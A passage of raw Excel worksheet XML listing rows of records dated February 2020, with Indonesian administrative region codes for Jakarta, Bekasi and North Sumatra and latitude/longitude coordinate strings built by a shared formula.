      <c r="Y1760" t="str">
        <f t="shared" si="27"/>
        <v>-6.18537,106.86799</v>
      </c>
    </row>
    <row r="1761" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1761">
        <v>109287</v>
      </c>
      <c r="B1761" s="1">
        <v>43886</v>
      </c>
      <c r="C1761">
        <v>0</v>
      </c>
      <c r="D1761" t="s">
        <v>22</v>
      </c>
      <c r="E1761" t="s">
        <v>23</v>
      </c>
      <c r="F1761" t="s">
        <v>6024</v>
      </c>
      <c r="G1761" t="s">
        <v>6025</v>
      </c>
      <c r="H1761" t="s">
        <v>26</v>
      </c>
      <c r="I1761" t="s">
        <v>27</v>
      </c>
      <c r="J1761" t="s">
        <v>6026</v>
      </c>
      <c r="L1761" t="s">
        <v>6027</v>
      </c>
      <c r="M1761">
        <v>3172050003</v>
      </c>
      <c r="N1761">
        <v>3172050</v>
      </c>
      <c r="O1761">
        <v>3172</v>
      </c>
      <c r="P1761">
        <v>31</v>
      </c>
      <c r="Q1761" t="s">
        <v>2896</v>
      </c>
      <c r="R1761" t="s">
        <v>358</v>
      </c>
      <c r="S1761" t="s">
        <v>49</v>
      </c>
      <c r="T1761" t="s">
        <v>33</v>
      </c>
      <c r="U1761" s="5">
        <v>10686563</v>
      </c>
      <c r="V1761" s="5" t="s">
        <v>16043</v>
      </c>
      <c r="W1761" s="5">
        <v>-629220</v>
      </c>
      <c r="X1761" t="s">
        <v>19808</v>
      </c>
      <c r="Y1761" t="str">
        <f t="shared" si="27"/>
        <v>-6.29220,106.86563</v>
      </c>
    </row>
    <row r="1762" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1762">
        <v>109288</v>
      </c>
      <c r="B1762" s="1">
        <v>43886</v>
      </c>
      <c r="C1762">
        <v>0</v>
      </c>
      <c r="D1762" t="s">
        <v>22</v>
      </c>
      <c r="E1762" t="s">
        <v>23</v>
      </c>
      <c r="F1762" t="s">
        <v>6028</v>
      </c>
      <c r="G1762" t="s">
        <v>6029</v>
      </c>
      <c r="H1762" t="s">
        <v>26</v>
      </c>
      <c r="I1762" t="s">
        <v>65</v>
      </c>
      <c r="J1762" t="s">
        <v>3438</v>
      </c>
      <c r="L1762" t="s">
        <v>6030</v>
      </c>
      <c r="M1762">
        <v>3172090007</v>
      </c>
      <c r="N1762">
        <v>3172090</v>
      </c>
      <c r="O1762">
        <v>3172</v>
      </c>
      <c r="P1762">
        <v>31</v>
      </c>
      <c r="Q1762" t="s">
        <v>890</v>
      </c>
      <c r="R1762" t="s">
        <v>890</v>
      </c>
      <c r="S1762" t="s">
        <v>49</v>
      </c>
      <c r="T1762" t="s">
        <v>33</v>
      </c>
      <c r="U1762" s="5">
        <v>10690274</v>
      </c>
      <c r="V1762" s="5" t="s">
        <v>16044</v>
      </c>
      <c r="W1762" s="5">
        <v>-618196</v>
      </c>
      <c r="X1762" t="s">
        <v>19580</v>
      </c>
      <c r="Y1762" t="str">
        <f t="shared" si="27"/>
        <v>-6.18196,106.90274</v>
      </c>
    </row>
    <row r="1763" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1763">
        <v>109289</v>
      </c>
      <c r="B1763" s="1">
        <v>43886</v>
      </c>
      <c r="C1763">
        <v>0</v>
      </c>
      <c r="D1763" t="s">
        <v>22</v>
      </c>
      <c r="E1763" t="s">
        <v>23</v>
      </c>
      <c r="F1763" t="s">
        <v>6031</v>
      </c>
      <c r="G1763" t="s">
        <v>6032</v>
      </c>
      <c r="H1763" t="s">
        <v>26</v>
      </c>
      <c r="I1763" t="s">
        <v>4361</v>
      </c>
      <c r="J1763" t="s">
        <v>2627</v>
      </c>
      <c r="L1763" t="s">
        <v>6033</v>
      </c>
      <c r="M1763">
        <v>3275012004</v>
      </c>
      <c r="N1763">
        <v>3275012</v>
      </c>
      <c r="O1763">
        <v>3275</v>
      </c>
      <c r="P1763">
        <v>32</v>
      </c>
      <c r="Q1763" t="s">
        <v>4941</v>
      </c>
      <c r="R1763" t="s">
        <v>4089</v>
      </c>
      <c r="S1763" t="s">
        <v>41</v>
      </c>
      <c r="T1763" t="s">
        <v>42</v>
      </c>
      <c r="U1763" s="5">
        <v>10693516</v>
      </c>
      <c r="V1763" s="5" t="s">
        <v>16045</v>
      </c>
      <c r="W1763" s="5">
        <v>-629581</v>
      </c>
      <c r="X1763" t="s">
        <v>19809</v>
      </c>
      <c r="Y1763" t="str">
        <f t="shared" si="27"/>
        <v>-6.29581,106.93516</v>
      </c>
    </row>
    <row r="1764" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1764">
        <v>109291</v>
      </c>
      <c r="B1764" s="1">
        <v>43886</v>
      </c>
      <c r="C1764">
        <v>0</v>
      </c>
      <c r="D1764" t="s">
        <v>22</v>
      </c>
      <c r="E1764" t="s">
        <v>23</v>
      </c>
      <c r="F1764" t="s">
        <v>6034</v>
      </c>
      <c r="H1764" t="s">
        <v>26</v>
      </c>
      <c r="I1764" t="s">
        <v>1201</v>
      </c>
      <c r="J1764" t="s">
        <v>2352</v>
      </c>
      <c r="L1764" t="s">
        <v>6035</v>
      </c>
      <c r="M1764">
        <v>3173060003</v>
      </c>
      <c r="N1764">
        <v>3173060</v>
      </c>
      <c r="O1764">
        <v>3173</v>
      </c>
      <c r="P1764">
        <v>31</v>
      </c>
      <c r="Q1764" t="s">
        <v>3773</v>
      </c>
      <c r="R1764" t="s">
        <v>61</v>
      </c>
      <c r="S1764" t="s">
        <v>62</v>
      </c>
      <c r="T1764" t="s">
        <v>33</v>
      </c>
      <c r="U1764" s="5">
        <v>10687528</v>
      </c>
      <c r="V1764" s="5" t="s">
        <v>16046</v>
      </c>
      <c r="W1764" s="5">
        <v>-616668</v>
      </c>
      <c r="X1764" t="s">
        <v>19810</v>
      </c>
      <c r="Y1764" t="str">
        <f t="shared" si="27"/>
        <v>-6.16668,106.87528</v>
      </c>
    </row>
    <row r="1765" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1765">
        <v>109292</v>
      </c>
      <c r="B1765" s="1">
        <v>43886</v>
      </c>
      <c r="C1765">
        <v>0</v>
      </c>
      <c r="D1765" t="s">
        <v>22</v>
      </c>
      <c r="E1765" t="s">
        <v>23</v>
      </c>
      <c r="F1765" t="s">
        <v>6036</v>
      </c>
      <c r="H1765" t="s">
        <v>26</v>
      </c>
      <c r="I1765" t="s">
        <v>6037</v>
      </c>
      <c r="J1765" t="s">
        <v>6038</v>
      </c>
      <c r="L1765" t="s">
        <v>6039</v>
      </c>
      <c r="M1765">
        <v>1205120013</v>
      </c>
      <c r="N1765">
        <v>1205120</v>
      </c>
      <c r="O1765">
        <v>1205</v>
      </c>
      <c r="P1765">
        <v>12</v>
      </c>
      <c r="Q1765" t="s">
        <v>6040</v>
      </c>
      <c r="R1765" t="s">
        <v>6041</v>
      </c>
      <c r="S1765" t="s">
        <v>6042</v>
      </c>
      <c r="T1765" t="s">
        <v>6043</v>
      </c>
      <c r="U1765" s="5">
        <v>9905101</v>
      </c>
      <c r="V1765" s="5" t="s">
        <v>16047</v>
      </c>
      <c r="W1765" s="5">
        <v>219266</v>
      </c>
      <c r="X1765" t="s">
        <v>19811</v>
      </c>
      <c r="Y1765" t="str">
        <f t="shared" si="27"/>
        <v>2.19266,99.05101</v>
      </c>
    </row>
    <row r="1766" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1766">
        <v>109293</v>
      </c>
      <c r="B1766" s="1">
        <v>43886</v>
      </c>
      <c r="C1766">
        <v>0</v>
      </c>
      <c r="D1766" t="s">
        <v>22</v>
      </c>
      <c r="E1766" t="s">
        <v>23</v>
      </c>
      <c r="F1766" t="s">
        <v>6044</v>
      </c>
      <c r="G1766" t="s">
        <v>6045</v>
      </c>
      <c r="H1766" t="s">
        <v>26</v>
      </c>
      <c r="I1766" t="s">
        <v>111</v>
      </c>
      <c r="J1766" t="s">
        <v>648</v>
      </c>
      <c r="M1766">
        <v>3174020005</v>
      </c>
      <c r="N1766">
        <v>3174020</v>
      </c>
      <c r="O1766">
        <v>3174</v>
      </c>
      <c r="P1766">
        <v>31</v>
      </c>
      <c r="Q1766" t="s">
        <v>30</v>
      </c>
      <c r="R1766" t="s">
        <v>31</v>
      </c>
      <c r="S1766" t="s">
        <v>32</v>
      </c>
      <c r="T1766" t="s">
        <v>33</v>
      </c>
      <c r="U1766" s="5">
        <v>10677955</v>
      </c>
      <c r="V1766" s="5" t="s">
        <v>16048</v>
      </c>
      <c r="W1766" s="5">
        <v>-617391</v>
      </c>
      <c r="X1766" t="s">
        <v>19812</v>
      </c>
      <c r="Y1766" t="str">
        <f t="shared" si="27"/>
        <v>-6.17391,106.77955</v>
      </c>
    </row>
    <row r="1767" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1767">
        <v>109294</v>
      </c>
      <c r="B1767" s="1">
        <v>43886</v>
      </c>
      <c r="C1767">
        <v>0</v>
      </c>
      <c r="D1767" t="s">
        <v>22</v>
      </c>
      <c r="E1767" t="s">
        <v>23</v>
      </c>
      <c r="F1767" t="s">
        <v>6046</v>
      </c>
      <c r="H1767" t="s">
        <v>26</v>
      </c>
      <c r="I1767" t="s">
        <v>44</v>
      </c>
      <c r="J1767" t="s">
        <v>1590</v>
      </c>
      <c r="L1767" t="s">
        <v>6047</v>
      </c>
      <c r="M1767">
        <v>3175030002</v>
      </c>
      <c r="N1767">
        <v>3175030</v>
      </c>
      <c r="O1767">
        <v>3175</v>
      </c>
      <c r="P1767">
        <v>31</v>
      </c>
      <c r="Q1767" t="s">
        <v>1592</v>
      </c>
      <c r="R1767" t="s">
        <v>1563</v>
      </c>
      <c r="S1767" t="s">
        <v>547</v>
      </c>
      <c r="T1767" t="s">
        <v>33</v>
      </c>
      <c r="U1767" s="5">
        <v>10688237</v>
      </c>
      <c r="V1767" s="5" t="s">
        <v>16049</v>
      </c>
      <c r="W1767" s="5">
        <v>-616077</v>
      </c>
      <c r="X1767" t="s">
        <v>19813</v>
      </c>
      <c r="Y1767" t="str">
        <f t="shared" si="27"/>
        <v>-6.16077,106.88237</v>
      </c>
    </row>
    <row r="1768" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1768">
        <v>109295</v>
      </c>
      <c r="B1768" s="1">
        <v>43886</v>
      </c>
      <c r="C1768">
        <v>0</v>
      </c>
      <c r="D1768" t="s">
        <v>22</v>
      </c>
      <c r="E1768" t="s">
        <v>23</v>
      </c>
      <c r="F1768" t="s">
        <v>6048</v>
      </c>
      <c r="G1768" t="s">
        <v>6049</v>
      </c>
      <c r="H1768" t="s">
        <v>26</v>
      </c>
      <c r="I1768" t="s">
        <v>3577</v>
      </c>
      <c r="J1768" t="s">
        <v>6050</v>
      </c>
      <c r="L1768" t="s">
        <v>3106</v>
      </c>
      <c r="M1768">
        <v>3172020005</v>
      </c>
      <c r="N1768">
        <v>3172020</v>
      </c>
      <c r="O1768">
        <v>3172</v>
      </c>
      <c r="P1768">
        <v>31</v>
      </c>
      <c r="Q1768" t="s">
        <v>3744</v>
      </c>
      <c r="R1768" t="s">
        <v>1644</v>
      </c>
      <c r="S1768" t="s">
        <v>49</v>
      </c>
      <c r="T1768" t="s">
        <v>33</v>
      </c>
      <c r="U1768" s="5">
        <v>10688217</v>
      </c>
      <c r="V1768" s="5" t="s">
        <v>16050</v>
      </c>
      <c r="W1768" s="5">
        <v>-631695</v>
      </c>
      <c r="X1768" t="s">
        <v>19814</v>
      </c>
      <c r="Y1768" t="str">
        <f t="shared" si="27"/>
        <v>-6.31695,106.88217</v>
      </c>
    </row>
    <row r="1769" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1769">
        <v>109296</v>
      </c>
      <c r="B1769" s="1">
        <v>43886</v>
      </c>
      <c r="C1769">
        <v>0</v>
      </c>
      <c r="D1769" t="s">
        <v>22</v>
      </c>
      <c r="E1769" t="s">
        <v>23</v>
      </c>
      <c r="F1769" t="s">
        <v>6051</v>
      </c>
      <c r="G1769" t="s">
        <v>6052</v>
      </c>
      <c r="H1769" t="s">
        <v>26</v>
      </c>
      <c r="I1769" t="s">
        <v>517</v>
      </c>
      <c r="J1769" t="s">
        <v>3585</v>
      </c>
      <c r="L1769" t="s">
        <v>6053</v>
      </c>
      <c r="M1769">
        <v>3173050001</v>
      </c>
      <c r="N1769">
        <v>3173050</v>
      </c>
      <c r="O1769">
        <v>3173</v>
      </c>
      <c r="P1769">
        <v>31</v>
      </c>
      <c r="Q1769" t="s">
        <v>2790</v>
      </c>
      <c r="R1769" t="s">
        <v>589</v>
      </c>
      <c r="S1769" t="s">
        <v>62</v>
      </c>
      <c r="T1769" t="s">
        <v>33</v>
      </c>
      <c r="U1769" s="5">
        <v>10686364</v>
      </c>
      <c r="V1769" s="5" t="s">
        <v>16051</v>
      </c>
      <c r="W1769" s="5">
        <v>-619003</v>
      </c>
      <c r="X1769" t="s">
        <v>19815</v>
      </c>
      <c r="Y1769" t="str">
        <f t="shared" si="27"/>
        <v>-6.19003,106.86364</v>
      </c>
    </row>
    <row r="1770" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1770">
        <v>109297</v>
      </c>
      <c r="B1770" s="1">
        <v>43886</v>
      </c>
      <c r="C1770">
        <v>0</v>
      </c>
      <c r="D1770" t="s">
        <v>22</v>
      </c>
      <c r="E1770" t="s">
        <v>23</v>
      </c>
      <c r="F1770" t="s">
        <v>6054</v>
      </c>
      <c r="H1770" t="s">
        <v>26</v>
      </c>
      <c r="I1770" t="s">
        <v>65</v>
      </c>
      <c r="J1770" t="s">
        <v>2523</v>
      </c>
      <c r="L1770" t="s">
        <v>6055</v>
      </c>
      <c r="M1770">
        <v>3175050001</v>
      </c>
      <c r="N1770">
        <v>3175050</v>
      </c>
      <c r="O1770">
        <v>3175</v>
      </c>
      <c r="P1770">
        <v>31</v>
      </c>
      <c r="Q1770" t="s">
        <v>1037</v>
      </c>
      <c r="R1770" t="s">
        <v>1013</v>
      </c>
      <c r="S1770" t="s">
        <v>547</v>
      </c>
      <c r="T1770" t="s">
        <v>33</v>
      </c>
      <c r="U1770" s="5">
        <v>10688971</v>
      </c>
      <c r="V1770" s="5" t="s">
        <v>16052</v>
      </c>
      <c r="W1770" s="5">
        <v>-615119</v>
      </c>
      <c r="X1770" t="s">
        <v>19816</v>
      </c>
      <c r="Y1770" t="str">
        <f t="shared" si="27"/>
        <v>-6.15119,106.88971</v>
      </c>
    </row>
    <row r="1771" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1771">
        <v>109298</v>
      </c>
      <c r="B1771" s="1">
        <v>43886</v>
      </c>
      <c r="C1771">
        <v>0</v>
      </c>
      <c r="D1771" t="s">
        <v>22</v>
      </c>
      <c r="E1771" t="s">
        <v>23</v>
      </c>
      <c r="F1771" t="s">
        <v>6056</v>
      </c>
      <c r="G1771" t="s">
        <v>6057</v>
      </c>
      <c r="H1771" t="s">
        <v>26</v>
      </c>
      <c r="I1771" t="s">
        <v>332</v>
      </c>
      <c r="J1771" t="s">
        <v>6058</v>
      </c>
      <c r="L1771" t="s">
        <v>6059</v>
      </c>
      <c r="M1771">
        <v>3174060004</v>
      </c>
      <c r="N1771">
        <v>3174060</v>
      </c>
      <c r="O1771">
        <v>3174</v>
      </c>
      <c r="P1771">
        <v>31</v>
      </c>
      <c r="Q1771" t="s">
        <v>4450</v>
      </c>
      <c r="R1771" t="s">
        <v>1762</v>
      </c>
      <c r="S1771" t="s">
        <v>32</v>
      </c>
      <c r="T1771" t="s">
        <v>33</v>
      </c>
      <c r="U1771" s="5">
        <v>10682122</v>
      </c>
      <c r="V1771" s="5" t="s">
        <v>16053</v>
      </c>
      <c r="W1771" s="5">
        <v>-614754</v>
      </c>
      <c r="X1771" t="s">
        <v>19817</v>
      </c>
      <c r="Y1771" t="str">
        <f t="shared" si="27"/>
        <v>-6.14754,106.82122</v>
      </c>
    </row>
    <row r="1772" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1772">
        <v>109299</v>
      </c>
      <c r="B1772" s="1">
        <v>43886</v>
      </c>
      <c r="C1772">
        <v>0</v>
      </c>
      <c r="D1772" t="s">
        <v>22</v>
      </c>
      <c r="E1772" t="s">
        <v>23</v>
      </c>
      <c r="F1772" t="s">
        <v>6060</v>
      </c>
      <c r="H1772" t="s">
        <v>26</v>
      </c>
      <c r="I1772" t="s">
        <v>27</v>
      </c>
      <c r="J1772" t="s">
        <v>6061</v>
      </c>
      <c r="L1772" t="s">
        <v>6062</v>
      </c>
      <c r="M1772">
        <v>3173080003</v>
      </c>
      <c r="N1772">
        <v>3173080</v>
      </c>
      <c r="O1772">
        <v>3173</v>
      </c>
      <c r="P1772">
        <v>31</v>
      </c>
      <c r="Q1772" t="s">
        <v>157</v>
      </c>
      <c r="R1772" t="s">
        <v>157</v>
      </c>
      <c r="S1772" t="s">
        <v>62</v>
      </c>
      <c r="T1772" t="s">
        <v>33</v>
      </c>
      <c r="U1772" s="5">
        <v>10683221</v>
      </c>
      <c r="V1772" s="5" t="s">
        <v>16054</v>
      </c>
      <c r="W1772" s="5">
        <v>-617956</v>
      </c>
      <c r="X1772" t="s">
        <v>19818</v>
      </c>
      <c r="Y1772" t="str">
        <f t="shared" si="27"/>
        <v>-6.17956,106.83221</v>
      </c>
    </row>
    <row r="1773" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1773">
        <v>109300</v>
      </c>
      <c r="B1773" s="1">
        <v>43886</v>
      </c>
      <c r="C1773">
        <v>0</v>
      </c>
      <c r="D1773" t="s">
        <v>22</v>
      </c>
      <c r="E1773" t="s">
        <v>23</v>
      </c>
      <c r="F1773" t="s">
        <v>6063</v>
      </c>
      <c r="G1773" t="s">
        <v>6064</v>
      </c>
      <c r="H1773" t="s">
        <v>26</v>
      </c>
      <c r="I1773" t="s">
        <v>5580</v>
      </c>
      <c r="J1773" t="s">
        <v>28</v>
      </c>
      <c r="L1773" t="s">
        <v>6065</v>
      </c>
      <c r="M1773">
        <v>3174020005</v>
      </c>
      <c r="N1773">
        <v>3174020</v>
      </c>
      <c r="O1773">
        <v>3174</v>
      </c>
      <c r="P1773">
        <v>31</v>
      </c>
      <c r="Q1773" t="s">
        <v>30</v>
      </c>
      <c r="R1773" t="s">
        <v>31</v>
      </c>
      <c r="S1773" t="s">
        <v>32</v>
      </c>
      <c r="T1773" t="s">
        <v>33</v>
      </c>
      <c r="U1773" s="5">
        <v>10676867</v>
      </c>
      <c r="V1773" s="5" t="s">
        <v>16055</v>
      </c>
      <c r="W1773" s="5">
        <v>-616980</v>
      </c>
      <c r="X1773" t="s">
        <v>19819</v>
      </c>
      <c r="Y1773" t="str">
        <f t="shared" si="27"/>
        <v>-6.16980,106.76867</v>
      </c>
    </row>
    <row r="1774" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1774">
        <v>109301</v>
      </c>
      <c r="B1774" s="1">
        <v>43886</v>
      </c>
      <c r="C1774">
        <v>0</v>
      </c>
      <c r="D1774" t="s">
        <v>22</v>
      </c>
      <c r="E1774" t="s">
        <v>23</v>
      </c>
      <c r="F1774" t="s">
        <v>6066</v>
      </c>
      <c r="G1774" t="s">
        <v>6067</v>
      </c>
      <c r="H1774" t="s">
        <v>26</v>
      </c>
      <c r="I1774" t="s">
        <v>555</v>
      </c>
      <c r="J1774" t="s">
        <v>4429</v>
      </c>
      <c r="M1774">
        <v>3171070002</v>
      </c>
      <c r="N1774">
        <v>3171070</v>
      </c>
      <c r="O1774">
        <v>3171</v>
      </c>
      <c r="P1774">
        <v>31</v>
      </c>
      <c r="Q1774" t="s">
        <v>2142</v>
      </c>
      <c r="R1774" t="s">
        <v>121</v>
      </c>
      <c r="S1774" t="s">
        <v>108</v>
      </c>
      <c r="T1774" t="s">
        <v>33</v>
      </c>
      <c r="U1774" s="5">
        <v>10682024</v>
      </c>
      <c r="V1774" s="5" t="s">
        <v>16056</v>
      </c>
      <c r="W1774" s="5">
        <v>-624233</v>
      </c>
      <c r="X1774" t="s">
        <v>19351</v>
      </c>
      <c r="Y1774" t="str">
        <f t="shared" si="27"/>
        <v>-6.24233,106.82024</v>
      </c>
    </row>
    <row r="1775" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1775">
        <v>109302</v>
      </c>
      <c r="B1775" s="1">
        <v>43886</v>
      </c>
      <c r="C1775">
        <v>0</v>
      </c>
      <c r="D1775" t="s">
        <v>22</v>
      </c>
      <c r="E1775" t="s">
        <v>23</v>
      </c>
      <c r="F1775" t="s">
        <v>6068</v>
      </c>
      <c r="G1775" t="s">
        <v>6069</v>
      </c>
      <c r="H1775" t="s">
        <v>26</v>
      </c>
      <c r="I1775" t="s">
        <v>6070</v>
      </c>
      <c r="J1775" t="s">
        <v>2627</v>
      </c>
      <c r="L1775" t="s">
        <v>6071</v>
      </c>
      <c r="M1775">
        <v>3275020005</v>
      </c>
      <c r="N1775">
        <v>3275020</v>
      </c>
      <c r="O1775">
        <v>3275</v>
      </c>
      <c r="P1775">
        <v>32</v>
      </c>
      <c r="Q1775" t="s">
        <v>827</v>
      </c>
      <c r="R1775" t="s">
        <v>828</v>
      </c>
      <c r="S1775" t="s">
        <v>41</v>
      </c>
      <c r="T1775" t="s">
        <v>42</v>
      </c>
      <c r="U1775" s="5">
        <v>10695280</v>
      </c>
      <c r="V1775" s="5" t="s">
        <v>16057</v>
      </c>
      <c r="W1775" s="5">
        <v>-628756</v>
      </c>
      <c r="X1775" t="s">
        <v>19820</v>
      </c>
      <c r="Y1775" t="str">
        <f t="shared" si="27"/>
        <v>-6.28756,106.95280</v>
      </c>
    </row>
    <row r="1776" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1776">
        <v>109303</v>
      </c>
      <c r="B1776" s="1">
        <v>43886</v>
      </c>
      <c r="C1776">
        <v>0</v>
      </c>
      <c r="D1776" t="s">
        <v>22</v>
      </c>
      <c r="E1776" t="s">
        <v>23</v>
      </c>
      <c r="F1776" t="s">
        <v>6072</v>
      </c>
      <c r="H1776" t="s">
        <v>26</v>
      </c>
      <c r="I1776" t="s">
        <v>1051</v>
      </c>
      <c r="J1776" t="s">
        <v>5871</v>
      </c>
      <c r="L1776" t="s">
        <v>6073</v>
      </c>
      <c r="M1776">
        <v>3173060003</v>
      </c>
      <c r="N1776">
        <v>3173060</v>
      </c>
      <c r="O1776">
        <v>3173</v>
      </c>
      <c r="P1776">
        <v>31</v>
      </c>
      <c r="Q1776" t="s">
        <v>3773</v>
      </c>
      <c r="R1776" t="s">
        <v>61</v>
      </c>
      <c r="S1776" t="s">
        <v>62</v>
      </c>
      <c r="T1776" t="s">
        <v>33</v>
      </c>
      <c r="U1776" s="5">
        <v>10687200</v>
      </c>
      <c r="V1776" s="5" t="s">
        <v>16058</v>
      </c>
      <c r="W1776" s="5">
        <v>-616053</v>
      </c>
      <c r="X1776" t="s">
        <v>19821</v>
      </c>
      <c r="Y1776" t="str">
        <f t="shared" si="27"/>
        <v>-6.16053,106.87200</v>
      </c>
    </row>
    <row r="1777" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1777">
        <v>109304</v>
      </c>
      <c r="B1777" s="1">
        <v>43886</v>
      </c>
      <c r="C1777">
        <v>0</v>
      </c>
      <c r="D1777" t="s">
        <v>22</v>
      </c>
      <c r="E1777" t="s">
        <v>23</v>
      </c>
      <c r="F1777" t="s">
        <v>6074</v>
      </c>
      <c r="H1777" t="s">
        <v>26</v>
      </c>
      <c r="I1777" t="s">
        <v>2002</v>
      </c>
      <c r="J1777" t="s">
        <v>2777</v>
      </c>
      <c r="L1777" t="s">
        <v>6075</v>
      </c>
      <c r="M1777">
        <v>3171070002</v>
      </c>
      <c r="N1777">
        <v>3171070</v>
      </c>
      <c r="O1777">
        <v>3171</v>
      </c>
      <c r="P1777">
        <v>31</v>
      </c>
      <c r="Q1777" t="s">
        <v>2142</v>
      </c>
      <c r="R1777" t="s">
        <v>121</v>
      </c>
      <c r="S1777" t="s">
        <v>108</v>
      </c>
      <c r="T1777" t="s">
        <v>33</v>
      </c>
      <c r="U1777" s="5">
        <v>10682103</v>
      </c>
      <c r="V1777" s="5" t="s">
        <v>16059</v>
      </c>
      <c r="W1777" s="5">
        <v>-624825</v>
      </c>
      <c r="X1777" t="s">
        <v>19822</v>
      </c>
      <c r="Y1777" t="str">
        <f t="shared" si="27"/>
        <v>-6.24825,106.82103</v>
      </c>
    </row>
    <row r="1778" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1778">
        <v>109305</v>
      </c>
      <c r="B1778" s="1">
        <v>43886</v>
      </c>
      <c r="C1778">
        <v>0</v>
      </c>
      <c r="D1778" t="s">
        <v>22</v>
      </c>
      <c r="E1778" t="s">
        <v>23</v>
      </c>
      <c r="F1778" t="s">
        <v>6076</v>
      </c>
      <c r="G1778" t="s">
        <v>6077</v>
      </c>
      <c r="H1778" t="s">
        <v>26</v>
      </c>
      <c r="I1778" t="s">
        <v>290</v>
      </c>
      <c r="J1778" t="s">
        <v>6078</v>
      </c>
      <c r="M1778">
        <v>3175010005</v>
      </c>
      <c r="N1778">
        <v>3175010</v>
      </c>
      <c r="O1778">
        <v>3175</v>
      </c>
      <c r="P1778">
        <v>31</v>
      </c>
      <c r="Q1778" t="s">
        <v>1686</v>
      </c>
      <c r="R1778" t="s">
        <v>546</v>
      </c>
      <c r="S1778" t="s">
        <v>547</v>
      </c>
      <c r="T1778" t="s">
        <v>33</v>
      </c>
      <c r="U1778" s="5">
        <v>10677885</v>
      </c>
      <c r="V1778" s="5" t="s">
        <v>16060</v>
      </c>
      <c r="W1778" s="5">
        <v>-611026</v>
      </c>
      <c r="X1778" t="s">
        <v>19823</v>
      </c>
      <c r="Y1778" t="str">
        <f t="shared" si="27"/>
        <v>-6.11026,106.77885</v>
      </c>
    </row>
    <row r="1779" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1779">
        <v>109306</v>
      </c>
      <c r="B1779" s="1">
        <v>43886</v>
      </c>
      <c r="C1779">
        <v>0</v>
      </c>
      <c r="D1779" t="s">
        <v>22</v>
      </c>
      <c r="E1779" t="s">
        <v>23</v>
      </c>
      <c r="F1779" t="s">
        <v>6079</v>
      </c>
      <c r="G1779" t="s">
        <v>6080</v>
      </c>
      <c r="H1779" t="s">
        <v>26</v>
      </c>
      <c r="I1779" t="s">
        <v>511</v>
      </c>
      <c r="J1779" t="s">
        <v>2627</v>
      </c>
      <c r="L1779" t="s">
        <v>6081</v>
      </c>
      <c r="M1779">
        <v>3275061004</v>
      </c>
      <c r="N1779">
        <v>3275061</v>
      </c>
      <c r="O1779">
        <v>3275</v>
      </c>
      <c r="P1779">
        <v>32</v>
      </c>
      <c r="Q1779" t="s">
        <v>39</v>
      </c>
      <c r="R1779" t="s">
        <v>40</v>
      </c>
      <c r="S1779" t="s">
        <v>41</v>
      </c>
      <c r="T1779" t="s">
        <v>42</v>
      </c>
      <c r="U1779" s="5">
        <v>10697959</v>
      </c>
      <c r="V1779" s="5" t="s">
        <v>16061</v>
      </c>
      <c r="W1779" s="5">
        <v>-618488</v>
      </c>
      <c r="X1779" t="s">
        <v>18421</v>
      </c>
      <c r="Y1779" t="str">
        <f t="shared" si="27"/>
        <v>-6.18488,106.97959</v>
      </c>
    </row>
    <row r="1780" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1780">
        <v>109307</v>
      </c>
      <c r="B1780" s="1">
        <v>43886</v>
      </c>
      <c r="C1780">
        <v>0</v>
      </c>
      <c r="D1780" t="s">
        <v>22</v>
      </c>
      <c r="E1780" t="s">
        <v>23</v>
      </c>
      <c r="F1780" t="s">
        <v>6082</v>
      </c>
      <c r="G1780" t="s">
        <v>6083</v>
      </c>
      <c r="H1780" t="s">
        <v>26</v>
      </c>
      <c r="I1780" t="s">
        <v>2300</v>
      </c>
      <c r="J1780" t="s">
        <v>2627</v>
      </c>
      <c r="L1780" t="s">
        <v>6084</v>
      </c>
      <c r="M1780">
        <v>3275040007</v>
      </c>
      <c r="N1780">
        <v>3275040</v>
      </c>
      <c r="O1780">
        <v>3275</v>
      </c>
      <c r="P1780">
        <v>32</v>
      </c>
      <c r="Q1780" t="s">
        <v>99</v>
      </c>
      <c r="R1780" t="s">
        <v>100</v>
      </c>
      <c r="S1780" t="s">
        <v>41</v>
      </c>
      <c r="T1780" t="s">
        <v>42</v>
      </c>
      <c r="U1780" s="5">
        <v>10702084</v>
      </c>
      <c r="V1780" s="5" t="s">
        <v>16062</v>
      </c>
      <c r="W1780" s="5">
        <v>-623645</v>
      </c>
      <c r="X1780" t="s">
        <v>19824</v>
      </c>
      <c r="Y1780" t="str">
        <f t="shared" si="27"/>
        <v>-6.23645,107.02084</v>
      </c>
    </row>
    <row r="1781" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1781">
        <v>109308</v>
      </c>
      <c r="B1781" s="1">
        <v>43886</v>
      </c>
      <c r="C1781">
        <v>0</v>
      </c>
      <c r="D1781" t="s">
        <v>22</v>
      </c>
      <c r="E1781" t="s">
        <v>23</v>
      </c>
      <c r="F1781" t="s">
        <v>6085</v>
      </c>
      <c r="G1781" t="s">
        <v>6086</v>
      </c>
      <c r="H1781" t="s">
        <v>26</v>
      </c>
      <c r="I1781" t="s">
        <v>1194</v>
      </c>
      <c r="J1781" t="s">
        <v>3658</v>
      </c>
      <c r="L1781" t="s">
        <v>6087</v>
      </c>
      <c r="M1781">
        <v>3175050002</v>
      </c>
      <c r="N1781">
        <v>3175050</v>
      </c>
      <c r="O1781">
        <v>3175</v>
      </c>
      <c r="P1781">
        <v>31</v>
      </c>
      <c r="Q1781" t="s">
        <v>1012</v>
      </c>
      <c r="R1781" t="s">
        <v>1013</v>
      </c>
      <c r="S1781" t="s">
        <v>547</v>
      </c>
      <c r="T1781" t="s">
        <v>33</v>
      </c>
